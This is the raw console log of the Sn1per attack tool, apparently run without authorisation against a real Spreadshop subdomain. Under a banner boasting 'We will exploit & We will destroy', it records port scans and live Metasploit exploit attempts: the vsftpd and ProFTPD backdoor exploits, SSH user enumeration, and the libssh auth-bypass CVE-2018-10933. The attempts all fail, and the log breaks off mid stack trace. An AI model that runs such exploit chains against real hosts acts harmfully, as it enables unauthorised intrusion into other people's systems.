*Note: This scan has been condensed and needs to parsed and fact checked.
██████ ███████ █████ ██ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██
██████ █████ ███████ ██ ██ ███████ █████
██ ██ ██ ██ ██ ██ ██ ██ ██
██████ ███████ ██ ██ ██████ ███████ ███████
██ ██ ██████ ██ ██
██ ██ ██ ██ ██ ██
████ ██ ██ ██ ██
██ ██ ██ ██ ██
██ ██████ ██████
██████ ███████ ██████ ██████ ██████ ████████ ███████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██████ █████ ██████ ██ ██ ██████ ██ █████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██████ ██ ██ ██ ███████ ██████
██████ ██ ██ ██████ █████ ██████ ██████ ██████ ██ ██ ███ ██ ████████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██
██ ██ ██ ██ ██████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██████ ██████ ██ ██ ██ ██ ██████ ██████ ██████ ██████ ██ ████ ██ ██ ██ ██
We are digging. We will find. We will exploit & We will destroy. Enjoy =)
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[https://sn1persecurity.com
+ -- --=[Sn1per v9.0 by @xer0dayz
modes/normal.sh: line 52: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/scans/guestmob.myspreadshop.com/-normal.txt: No such file or directory
modes/normal.sh: line 53: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/scans/running_guestmob.myspreadshop.com/_normal.txt: No such file or directory
====================================================================================•x[2022-02-21](13:02)x•
GATHERING DNS INFO
====================================================================================•x[2022-02-21](13:02)x•
modes/normal.sh: line 64: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/nmap/dns-guestmob.myspreadshop.com/.txt: No such file or directory
modes/normal.sh: line 65: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/nmap/dns-guestmob.myspreadshop.com/.txt: No such file or directory
====================================================================================•x[2022-02-21](13:02)x•
CHECKING FOR SUBDOMAIN HIJACKING
====================================================================================•x[2022-02-21](13:02)x•
====================================================================================•x[2022-02-21](13:02)x•
PINGING HOST
====================================================================================•x[2022-02-21](13:02)x•
ping: guestmob.myspreadshop.com/: Name or service not known
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 closed... skipping.
+ -- --=[Port 23 closed... skipping.
+ -- --=[Port 25 closed... skipping.
+ -- --=[Port 53 closed... skipping.
+ -- --=[Port 67 closed... skipping.
+ -- --=[Port 68 closed... skipping.
+ -- --=[Port 69 closed... skipping.
+ -- --=[Port 79 closed... skipping.
+ -- --=[Port 110 closed... skipping.
+ -- --=[Port 111 closed... skipping.
+ -- --=[Port 123 closed... skipping.
+ -- --=[Port 135 closed... skipping.
+ -- --=[Port 137 closed... skipping.
+ -- --=[Port 139 closed... skipping.
+ -- --=[Port 161 closed... skipping.
+ -- --=[Port 162 closed... skipping.
+ -- --=[Port 264 closed... skipping.
+ -- --=[Port 389 closed... skipping.
+ -- --=[Port 445 closed... skipping.
+ -- --=[Port 500 closed... skipping.
+ -- --=[Port 512 closed... skipping.
+ -- --=[Port 513 closed... skipping.
+ -- --=[Port 514 closed... skipping.
+ -- --=[Port 1099 closed... skipping.
+ -- --=[Port 1433 closed... skipping.
+ -- --=[Port 2049 closed... skipping.
+ -- --=[Port 2181 closed... skipping.
+ -- --=[Port 3306 closed... skipping.
+ -- --=[Port 3310 closed... skipping.
+ -- --=[Port 3128 closed... skipping.
+ -- --=[Port 3389 closed... skipping.
+ -- --=[Port 3632 closed... skipping.
+ -- --=[Port 5432 closed... skipping.
+ -- --=[Port 5555 closed... skipping.
+ -- --=[Port 5800 closed... skipping.
+ -- --=[Port 5900 closed... skipping.
+ -- --=[Port 5984 closed... skipping.
+ -- --=[Port 6000 closed... skipping.
+ -- --=[Port 6667 closed... skipping.
+ -- --=[Port 7001 closed... skipping.
+ -- --=[Port 8000 closed... skipping.
+ -- --=[Port 8001 closed... skipping.
+ -- --=[Port 9495 closed... skipping.
+ -- --=[Port 10000 closed... skipping.
+ -- --=[Port 16992 closed... skipping.
+ -- --=[Port 27017 closed... skipping.
+ -- --=[Port 27018 closed... skipping.
+ -- --=[Port 27019 closed... skipping.
+ -- --=[Port 28017 closed... skipping.
+ -- --=[Port 49180 closed... skipping.
====================================================================================•x[2022-02-21](13:02)x•
SCANNING ALL HTTP PORTS
====================================================================================•x[2022-02-21](13:02)x•
cat: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/nmap/nmap-guestmob.myspreadshop.com/.xml: No such file or directory
====================================================================================•x[2022-02-21](13:02)x•
SCANNING ALL HTTPS PORTS
====================================================================================•x[2022-02-21](13:02)x•
cat: /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com-/nmap/nmap-guestmob.myspreadshop.com/.xml: No such file or directory
====================================================================================•x[2022-02-21](13:02)x•
RUNNING SC0PE NETWORK VULNERABILITY SCAN
====================================================================================•x[2022-02-21](13:02)x•
====================================================================================•x[2022-02-21](13:02)x•
====================================================================================•x[2022-02-21](13:02)x•
PERFORMING TCP PORT SCAN
====================================================================================•x[2022-02-21](13:02)x•
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
[*] Opening loot directory /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com- [OK]
+ -- --=[ Generating reports...
[]
+ -- --=[ Sorting all files...
+ -- --=[ Removing blank screenshots and files...
+ -- --=[ Sn1per Professional is not installed. To download Sn1per Professional, go to https://sn1persecurity.com.
+ -- --=[ Done!
┌─[✗]─[juicesleuth@str1kef0rce]─[~]
└──╼ $sudo sniper -t guestmob.myspreadshop.com
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/ [OK]
[*] Scanning guestmob.myspreadshop.com [OK]
[*] Checking for active internet connection [OK]
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/guestmob.myspreadshop.com [OK]
[*] Scanning guestmob.myspreadshop.com [OK]
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[https://sn1persecurity.com
+ -- --=[Sn1per v9.0 by @xer0dayz
====================================================================================•x[2022-02-21](13:02)x•
GATHERING DNS INFO
====================================================================================•x[2022-02-21](13:02)x•
====================================================================================•x[2022-02-21](13:02)x•
CHECKING FOR SUBDOMAIN HIJACKING
====================================================================================•x[2022-02-21](13:02)x•
====================================================================================•x[2022-02-21](13:02)x•
PINGING HOST
====================================================================================•x[2022-02-21](13:02)x•
PING guestmob.myspreadshop.com (151.101.130.137) 56(84) bytes of data.
64 bytes from 151.101.130.137 (151.101.130.137): icmp_seq=1 ttl=58 time=63.8 ms
--- guestmob.myspreadshop.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 63.771/63.771/63.771/0.000 ms
====================================================================================•x[2022-02-21](13:02)x•
RUNNING TCP PORT SCAN
====================================================================================•x[2022-02-21](13:02)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 13:02 EST
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.17s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649
Not shown: 11 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
53/tcp open domain
67/tcp open dhcps
68/tcp open dhcpc
69/tcp open tftp
79/tcp open finger
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
123/tcp open ntp
135/tcp open msrpc
161/tcp open snmp
162/tcp open snmptrap
264/tcp open bgmp
443/tcp open https
500/tcp open isakmp
512/tcp open exec
513/tcp open login
514/tcp open shell
623/tcp open oob-ws-http
624/tcp open cryptoadmin
1099/tcp open rmiregistry
1433/tcp open ms-sql-s
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
2181/tcp open eforward
3128/tcp open squid-http
3310/tcp open dyna-access
3389/tcp open ms-wbt-server
3632/tcp open distccd
4443/tcp open pharos
5555/tcp open freeciv
5800/tcp open vnc-http
5900/tcp open vnc
5984/tcp open couchdb
6667/tcp open irc
7001/tcp open afs3-callback
8000/tcp open http-alt
8001/tcp open vcom-tunnel
8080/tcp open http-proxy
8180/tcp open unknown
8443/tcp open https-alt
8888/tcp open sun-answerbook
9495/tcp open unknown
10000/tcp open snet-sensor-mgmt
16992/tcp open amt-soap-http
28017/tcp open mongod
49152/tcp open unknown
49180/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 3.24 seconds
====================================================================================•x[2022-02-21](13:02)x•
RUNNING INTRUSIVE SCANS
====================================================================================•x[2022-02-21](13:02)x•
+ -- --=[Port 21 opened... running tests...
====================================================================================•x[2022-02-21](13:02)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](13:02)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 13:02 EST
NSE: Loaded 54 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:02
Completed NSE at 13:02, 0.00s elapsed
Initiating NSE at 13:02
Completed NSE at 13:02, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:02
Completed Parallel DNS resolution of 1 host. at 13:02, 0.06s elapsed
Initiating SYN Stealth Scan at 13:02
Scanning guestmob.myspreadshop.com (151.101.194.137) [1 port]
Discovered open port 21/tcp on 151.101.194.137
Completed SYN Stealth Scan at 13:02, 0.08s elapsed (1 total ports)
Initiating Service scan at 13:02
Scanning 1 service on guestmob.myspreadshop.com (151.101.194.137)
Completed Service scan at 13:05, 158.68s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.194.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.194.137)
Initiating Traceroute at 13:05
Completed Traceroute at 13:05, 0.17s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:05
Completed Parallel DNS resolution of 1 host. at 13:05, 0.11s elapsed
NSE: Script scanning 151.101.194.137.
Initiating NSE at 13:05
NSE Timing: About 70.83% done; ETC: 13:06 (0:00:30 remaining)
Completed NSE at 13:06, 90.72s elapsed
Initiating NSE at 13:06
Completed NSE at 13:06, 1.27s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.194.137)
Host is up (0.13s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.2.137 151.101.66.137 151.101.130.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649
PORT STATE SERVICE VERSION
21/tcp open ftp?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.4 (89%), Linux 5.3 - 5.4 (89%), Linux 5.0 (88%), Linux 5.0 - 5.3 (88%), Linux 5.0 - 5.4 (88%), Linux 2.6.32 (87%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 4.757 days (since Wed Feb 16 18:57:10 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 170.43 ms 151.101.194.137
NSE: Script Post-scanning.
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
Initiating NSE at 13:06
Completed NSE at 13:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 257.54 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 37 (2.405KB)
====================================================================================•x[2022-02-21](13:06)x•
RUNNING METASPLOIT FTP VERSION SCANNER
====================================================================================•x[2022-02-21](13:06)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
[*] guestmob.myspreadshop.com:21 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](13:08)x•
RUNNING METASPLOIT ANONYMOUS FTP SCANNER
====================================================================================•x[2022-02-21](13:08)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
[*] guestmob.myspreadshop.com:21 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:21 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](13:09)x•
RUNNING VSFTPD 2.3.4 BACKDOOR EXPLOIT
====================================================================================•x[2022-02-21](13:09)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] No payload configured, defaulting to cmd/unix/interact
[*] Exploiting target 151.101.2.137
[*] 151.101.2.137:21 - The port used by the backdoor bind listener is already open
[-] 151.101.2.137:21 - The service on port 6200 does not appear to be a shell
[*] Exploiting target 151.101.66.137
[*] 151.101.66.137:21 - The port used by the backdoor bind listener is already open
[-] 151.101.66.137:21 - The service on port 6200 does not appear to be a shell
[*] Exploiting target 151.101.130.137
[*] 151.101.130.137:21 - The port used by the backdoor bind listener is already open
[-] 151.101.130.137:21 - The service on port 6200 does not appear to be a shell
[*] Exploiting target 151.101.194.137
[*] 151.101.194.137:21 - The port used by the backdoor bind listener is already open
[-] 151.101.194.137:21 - The service on port 6200 does not appear to be a shell
[*] Exploiting target 2a04:4e42:600::649
[-] 2a04:4e42:600::649:21 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:600::649]:21) was unreachable.
[*] Exploiting target 2a04:4e42::649
[-] 2a04:4e42::649:21 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42::649]:21) was unreachable.
[*] Exploiting target 2a04:4e42:200::649
[-] 2a04:4e42:200::649:21 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:200::649]:21) was unreachable.
[*] Exploiting target 2a04:4e42:400::649
[-] 2a04:4e42:400::649:21 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:400::649]:21) was unreachable.
[*] Exploit completed, but no session was created.
====================================================================================•x[2022-02-21](13:10)x•
RUNNING PROFTPD 1.3.3C BACKDOOR EXPLOIT
====================================================================================•x[2022-02-21](13:10)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.66.137
[-] 151.101.66.137:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.130.137
[-] 151.101.130.137:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.194.137
[-] 151.101.194.137:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.2.137
[-] 151.101.2.137:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:600::649
[-] 2a04:4e42:600::649:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42::649
[-] 2a04:4e42::649:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:200::649
[-] 2a04:4e42:200::649:21 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:400::649
[-] 2a04:4e42:400::649:21 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
+ -- --=[Port 22 opened... running tests...
====================================================================================•x[2022-02-21](13:10)x•
RUNNING SSH AUDIT
====================================================================================•x[2022-02-21](13:10)x•
[exception] did not receive banner.
====================================================================================•x[2022-02-21](13:10)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](13:10)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 13:10 EST
NSE: Loaded 51 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:10
Completed NSE at 13:10, 0.00s elapsed
Initiating NSE at 13:10
Completed NSE at 13:10, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:10
Completed Parallel DNS resolution of 1 host. at 13:10, 0.07s elapsed
Initiating SYN Stealth Scan at 13:10
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 22/tcp on 151.101.130.137
Completed SYN Stealth Scan at 13:10, 0.11s elapsed (1 total ports)
Initiating Service scan at 13:10
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 13:13, 158.39s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 13:13
Completed Traceroute at 13:13, 0.10s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:13
Completed Parallel DNS resolution of 1 host. at 13:13, 0.09s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 13:13
Completed NSE at 13:13, 15.53s elapsed
Initiating NSE at 13:13
Completed NSE at 13:13, 1.11s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.079s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649
PORT STATE SERVICE VERSION
22/tcp open ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_ssh-run: ERROR: Script execution failed (use -d to debug)
|_ssh-brute: ERROR: Script execution failed (use -d to debug)
|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
|_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.425 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 91.95 ms 151.101.130.137
NSE: Script Post-scanning.
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Initiating NSE at 13:13
Completed NSE at 13:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 180.20 seconds
Raw packets sent: 70 (6.812KB) | Rcvd: 39 (2.728KB)
====================================================================================•x[2022-02-21](13:13)x•
RUNNING SSH VERSION SCANNER
====================================================================================•x[2022-02-21](13:13)x•
USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
RHOSTS => guestmob.myspreadshop.com
RHOST => guestmob.myspreadshop.com
[*] guestmob.myspreadshop.com:22 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:22 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](13:14)x•
RUNNING OPENSSH USER ENUM SCANNER
====================================================================================•x[2022-02-21](13:14)x•
USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
RHOSTS => guestmob.myspreadshop.com
RHOST => guestmob.myspreadshop.com
[*] 151.101.194.137:22 - SSH - Using malformed packet technique
[*] 151.101.194.137:22 - SSH - Starting scan
[*] Scanned 1 of 8 hosts (12% complete)
[*] 151.101.2.137:22 - SSH - Using malformed packet technique
[*] 151.101.2.137:22 - SSH - Starting scan
[*] Scanned 2 of 8 hosts (25% complete)
[*] 151.101.66.137:22 - SSH - Using malformed packet technique
[*] 151.101.66.137:22 - SSH - Starting scan
[*] Scanned 3 of 8 hosts (37% complete)
[*] 151.101.130.137:22 - SSH - Using malformed packet technique
[*] 151.101.130.137:22 - SSH - Starting scan
[*] Scanned 4 of 8 hosts (50% complete)
[*] 2a04:4e42:200::649:22 - SSH - Using malformed packet technique
[*] 2a04:4e42:200::649:22 - SSH - Starting scan
[*] Scanned 4 of 8 hosts (50% complete)
[*] Scanned 5 of 8 hosts (62% complete)
[*] 2a04:4e42:400::649:22 - SSH - Using malformed packet technique
[*] 2a04:4e42:400::649:22 - SSH - Starting scan
[*] Scanned 6 of 8 hosts (75% complete)
[*] 2a04:4e42:600::649:22 - SSH - Using malformed packet technique
[*] 2a04:4e42:600::649:22 - SSH - Starting scan
[*] Scanned 7 of 8 hosts (87% complete)
[*] 2a04:4e42::649:22 - SSH - Using malformed packet technique
[*] 2a04:4e42::649:22 - SSH - Starting scan
[*] Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](14:20)x•
RUNNING LIBSSH AUTH BYPASS EXPLOIT CVE-2018-10933
====================================================================================•x[2022-02-21](14:20)x•
RHOSTS => guestmob.myspreadshop.com
RHOST => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] 151.101.194.137:22 - Attempting authentication bypass
[*] Scanned 1 of 8 hosts (12% complete)
[*] 151.101.2.137:22 - Attempting authentication bypass
[*] Scanned 2 of 8 hosts (25% complete)
[*] 151.101.66.137:22 - Attempting authentication bypass
[*] Scanned 3 of 8 hosts (37% complete)
[*] 151.101.130.137:22 - Attempting authentication bypass
[*] Scanned 4 of 8 hosts (50% complete)
[*] 2a04:4e42:200::649:22 - Attempting authentication bypass
[*] Scanned 5 of 8 hosts (62% complete)
[*] 2a04:4e42:400::649:22 - Attempting authentication bypass
[*] Scanned 6 of 8 hosts (75% complete)
[*] 2a04:4e42:600::649:22 - Attempting authentication bypass
[*] Scanned 7 of 8 hosts (87% complete)
[*] 2a04:4e42::649:22 - Attempting authentication bypass
[*] Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
+ -- --=[Port 23 opened... running tests...
====================================================================================•x[2022-02-21](14:20)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](14:20)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:20 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
Initiating NSE at 14:21
Completed NSE at 14:21, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:21
Completed Parallel DNS resolution of 1 host. at 14:21, 0.08s elapsed
Initiating SYN Stealth Scan at 14:21
Scanning guestmob.myspreadshop.com (151.101.66.137) [1 port]
Discovered open port 23/tcp on 151.101.66.137
Completed SYN Stealth Scan at 14:21, 0.09s elapsed (1 total ports)
Initiating Service scan at 14:21
Scanning 1 service on guestmob.myspreadshop.com (151.101.66.137)
Completed Service scan at 14:23, 164.21s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.66.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.66.137)
Initiating Traceroute at 14:23
Completed Traceroute at 14:23, 0.18s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:23
Completed Parallel DNS resolution of 1 host. at 14:23, 0.10s elapsed
NSE: Script scanning 151.101.66.137.
Initiating NSE at 14:23
Completed NSE at 14:24, 15.18s elapsed
Initiating NSE at 14:24
Completed NSE at 14:24, 1.10s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.66.137)
Host is up (0.13s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.130.137 151.101.194.137 151.101.2.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649
PORT STATE SERVICE VERSION
23/tcp open telnet?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 20.937 days (since Mon Jan 31 15:54:54 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 173.40 ms 151.101.66.137
NSE: Script Post-scanning.
Initiating NSE at 14:24
Completed NSE at 14:24, 0.00s elapsed
Initiating NSE at 14:24
Completed NSE at 14:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.82 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 44 (3.212KB)
====================================================================================•x[2022-02-21](14:24)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](14:24)x•
RHOSTS => guestmob.myspreadshop.com
RHOST => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] Scanned 1 of 8 hosts (12% complete)
[*] Scanned 2 of 8 hosts (25% complete)
[*] Scanned 3 of 8 hosts (37% complete)
[*] Scanned 4 of 8 hosts (50% complete)
[-] Connection error
[*] Scanned 5 of 8 hosts (62% complete)
[-] Connection error
[*] Scanned 6 of 8 hosts (75% complete)
[-] Connection error
[*] Scanned 7 of 8 hosts (87% complete)
[-] Connection error
[*] Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
[-] 151.101.194.137:9999 - Connection reset by peer ["/usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'", "/usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:160:in `recv_telnet'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:146:in `recv'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:125:in `block in connect'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:123:in `connect'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:35:in `block in run_host'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", 